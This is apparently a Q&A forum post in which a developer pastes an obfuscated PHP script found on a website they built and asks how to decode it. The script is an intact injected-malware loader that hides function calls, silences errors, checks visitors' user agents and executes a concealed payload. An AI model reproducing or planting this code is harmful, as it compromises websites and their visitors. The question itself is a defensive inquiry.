# Is it possible to decode obfuscated PHP code

Tags: php, decode, obfuscation

I noticed this script when I checked all the files in one of the website I developed recently, but can't figure out what it does. How can I convert it to an editable form?

```
<?php  
    $kmkale = 'j%7-C)fepmqnjA   x27&6<.fmjgA    x27doj%6<   x7fw6*  x7f_*#fmjgk4`{6~6!Ydrr)%rxB%epnbss!>!bssbz)#44%rxW~!Ypp2)%zB%z>!    x24/%tmw/   x24)%zW%)m%=*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58}#-#   x24-    x24-tusqpt)%z-#:#*  x24-    x24!>!  x24/%tjw/   x24)*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d81K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6!<**2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>b%!|!*)323zbek!~!<b%  x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6<    x7fw6*CW&)7gjpo!    x24-    x24y7   x24-    x24*<!  x24-    x24gps)%j>1<%j=tj{fp%h>EzH,2W%wN;#-Ez-1H*19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|x75 156 x61"]=1; $uas=strtolower($_SERVER[" x48 124 x54 120 x5f <tfs%w6<    x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR   x27tfs%6<*17-Sq%)ufttj  x22)gj6<^#Y#    x5cq%   x27Y%6<{66~6<&w6<   x7fw6*CW&)7gj6<*do2]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>!   x2400~<#opo#>b%!**X)ufttj   x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-u!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3!   xG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-C>^#zsfvr#  x5cq%7**^#zsfvr#    x5c#    x24#-!#]y38#-!%w:**<")));6:+946:ce44#)zbssb!>!ssbnpe27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>:**#ppde#)tutjyf`4 x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudovg+)!uas,"    x6d 163 x69 145")) or (strstr($uas,"    x72 166 x3a 61  x31")))boe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#poV;hojepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x    x22lvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-L3]248L3P6L1M5]D2P4]D6#<%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597ec:649#-!#:618d5f9#-!#f6c68399#-!#65283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]!opjudovg}k~~9{d%:osvufs:~95`hA x27pd%6<pd%w6Z6<    x246767~6<Cw6<pd%w6Z6<..4`hA    x27pd%6<pd%w6Z6<.3`hA   x27pd%6<pd%w6Z6<.2`hA   x27pd%6<C   x27pd%6|6.6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX    x27u%)7fmjix6<C x27&6<*,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fo<!fmtf!%b:>%s:   x5c%j:.2^,%b:<!%c:>%s:  x5c%j:^<!%w`    x5c^>Ew:Qb:Qc:)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_ x5c}X   x2])))) { $GLOBALS["    x61 156 SV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16gj+{e%!osvufs!*!+A!>!{e%)!>>    x22!ftmbg)  x24)%c*W%eN+#Qi x5c1^W%c!>!%i   x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~m!|!*5!   x27!hmg%)!gj!|!*1?hmg%)!gj125   x53 105 x52 137 x41 107 x45 116 x54"]); if ((strstr($WCw*[!%rN}#QwTW%hIr    x5c1^-%r    x5c6]y81]265]y72]254]y76#<!%w:!>!(%w:!>!:!}V;3q%}U;y]}R;2]},;osvufs}    x27;mnui}&;zepc}A;~!}   x7f;!|!}{;)g.msv`ftsbqA7>q%6<   x7fw6*  x7f_*#fubfsdXk5`_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&f-s.973:8297f:5297e:56-xr.985:52985-t.98]K4]65]D8]8W~!%z!>2<!gps)%j>1<%j=6[%nnbrpoa = implode(array_map("acdbhfi",6<    x7fw6*3qj%7>    x2272qj%)7gj6<**2qnbozcYufhA    x272qj%6<^#zsfvr#   x5cq%7/7#@#7/7^#iubq#   x5cq%   x27jsv%6<*#j{hnpd#)tutjyf`opjudovg  x22)!gj}1~!<2p% x7f!~if((function_exists("  x6f 142 x5f 163 x74:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]628>> x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h2#-#!#-%tmw)%tww**WYsboepn)%b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#2]445]43]321]464]284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!%bss    x5cs%   x24-    x24y4   x24-    x24]y8  x24-    x24]26  x24-    x24<%j,,*!| x24-    x24gvodujegb2dc#*<!sfuvso!sboepn)%epnbss-j%)hopm3qjA)qj3hopmA   x273qj%6<*Y%)f71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]_;gvc%}&;ftmbg}    x7f;!osvufs}w;* x7f!>>  x22!pd%)!gj}Z;#-#}+;%-qp%)54l}  x27;%!<*#}_;#)323ldfid>}&;!osvufs}  x7f;88]5]48]32M3]317]445]21unction acdbhfi($n){return chr(ord($n)-1);} @%6< x7fw6*  x7f_*#ujojRk3`{666~6<&w6<   x7fw6*CW&)7gj6<.[A  x27&6<  x7y]472]37y]672]48y]#>s%<#462]47y]252]18y]#gj!<*2bd%-#1GO   x22#)fepmqyfA>26]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:75983:48984:fxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qs-  x24 x5c%j^  x24-    x24<!%t2w>#]y74]273]y76]25!<##!>!2p%Z<^2    x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!v%7UFH#   x27rfs%6~6< x7fw6<*K)ftpmdXA6|7**1fw6*  x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;uttvctus)% x24-    x24b!>!%yy)#g)% x24-    x24*<!~!    x24/%t2w/   x24)##-!#~<#/%  x24-    x24!>!fyqmpef)# ]278]225]241]334]368]322]3]364]6]FEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR   x27idvd}R;*msv%)}.;`UQPMSVD!j}l;33bq}k;opjudovg}x;0]=])0#)U!    x27{**u%-#jt0}Z;0]=]0#-id%)uqpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!}:*r%:-t%)3of:opjudovg<~   x24<!%o:!>! x242178}527}88:}334}47!fmtf!%z>2<!%ww2)%w`TW~   x24npd/#)rrd/#00;quui#>.%!<***f x97-2qj%7-K)udfoopdXA   x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-4<!%tmw!>!#]y84]275]y83]273]y76]277#ubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjyfu%)3of)fepdof`57ftbc   x7f!|!*uyfu x27k:!ftmf;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs-bubE{h%)tpqsut>j%!*9!  x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-b!}Z;^nbsbq%   x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},j%!*72!   x27!hmg%)!gj!<2,*j%-#1]#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1{ftmfV   x7f<*X&Z&S{ftmfV    x7f<*XAZA>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!*$umxzfqz = $blbdecb("", $nnbrp5 x5f 146 x75 156 x63 164 x69 157 x6e"; f#7>/7rfs%6<#o]1/20QUUI7js>q%<#762]67y]562]38y]572]48y]#>m%:|error_reporting(0); $]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275UFOJ`GB)fubfsdXA x27Krfs%7-K)fujsxX6<#o]o]Y%7;utpIpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`ms7y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t { $blbdecb = "    x63 162 x65 141 x74 14_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&dx24*<!%t::!>!    x24Ypp3)%cB%iN}#-!  x24/%tmw/G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%b#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<2^-%hOh/#00#W~!%t2w)##Qtjw)#]82  x24<!%ff2!>!bssbz)  x24]25  x24-    x24-!%  x24-    x24*!|! x24tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37str_split("%tjw!>!#]y84]275]y83]248]y83]25!gj<*#k#)usbut`cpV  x7f x7f x7f x7f<u%V x2727,*e    x27,*d  x27,*c  x27,*b  x27)fepdof.)fepdof./["  x61 156 x75 156 x61"    141 x72 164") && (!isset($GLOBALSoa); $umxzfqz();}}#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)sTrREvxNoiTCnuf_EtaerCxECalPer_Rtsjwqsxsbcf';
$cqfonxc = explode(chr((544 - 424)), substr($kmkale, (39363 - 33486), (143 - 109)));
$pawnrdtll = $cqfonxc[0]($cqfonxc[(4 - 3) ]);
$bmvtaqfq = $cqfonxc[0]($cqfonxc[(12 - 10) ]);
if (!function_exists('hwbxubj')) {
    function hwbxubj($yovhrg, $lzzqgakz, $tpwfri) {
        $momntpvm = NULL;
        for ($smmrtussqv = 0;$smmrtussqv < (sizeof($yovhrg) / 2);$smmrtussqv++) {
            $momntpvm.= substr($lzzqgakz, $yovhrg[($smmrtussqv * 2) ], $yovhrg[($smmrtussqv * 2) + (3 - 2) ]);
        }
        return $tpwfri(chr((51 - 42)), chr((482 - 390)), $momntpvm);
    };
}
$zxwcpmkg = explode(chr((267 - 223)), '2828,41,5765,34,5742,23,2096,27,661,64,2305,57,1318,65,5199,38,4896,41,3425,45,4997,21,2643,38,5611,42,2394,37,1765,24,1744,21,1789,70,466,67,1859,66,5078,29,4937,25,3817,42,4333,53,5057,21,2681,34,3207,35,2715,66,1130,31,790,35,2494,41,825,29,0,62,725,65,4022,70,3470,65,3859,40,5107,46,4092,23,4170,48,3293,52,4502,62,974,65,1215,41,4679,32,4564,61,4422,35,2271,34,357,57,4811,55,2781,47,3772,45,3576,30,3002,38,4303,30,5695,47,5365,65,3671,57,1485,61,236,66,1188,27,5237,37,2535,32,414,52,916,58,4457,45,4625,54,3345,57,1717,27,2917,57,606,55,1256,62,2171,39,5653,42,4778,33,2123,48,1925,48,1429,56,2431,63,4115,55,2038,58,4386,36,3749,23,854,62,2869,48,5153,46,127,54,3535,41,4962,35,4218,58,5492,56,3728,21,3899,26,181,55,3107,68,533,52,3925,64,5274,42,2210,61,62,29,1632,36,3175,32,91,36,585,21,2362,32,5462,30,2974,28,1571,61,2567,51,3606,65,3242,51,302,55,5018,39,1546,25,5316,49,1039,33,5548,63,3989,33,1668,49,3402,23,3040,67,1383,46,4711,67,1973,65,2618,25,5430,32,4276,27,1072,58,5817,60,1161,27,4866,30,5799,18');
$jxtucsvnt = $pawnrdtll("", hwbxubj($zxwcpmkg, $kmkale, $bmvtaqfq));
$pawnrdtll = $kmkale;
$jxtucsvnt("");
$jxtucsvnt = (473 - 352);
$kmkale = $jxtucsvnt - 1;

?>
```

Comment: Possible duplicate of http://stackoverflow.com/questions/37642293/unable-to-decode-a-given-code-in-javascript?

Comment: Try this: https://www.unphp.net/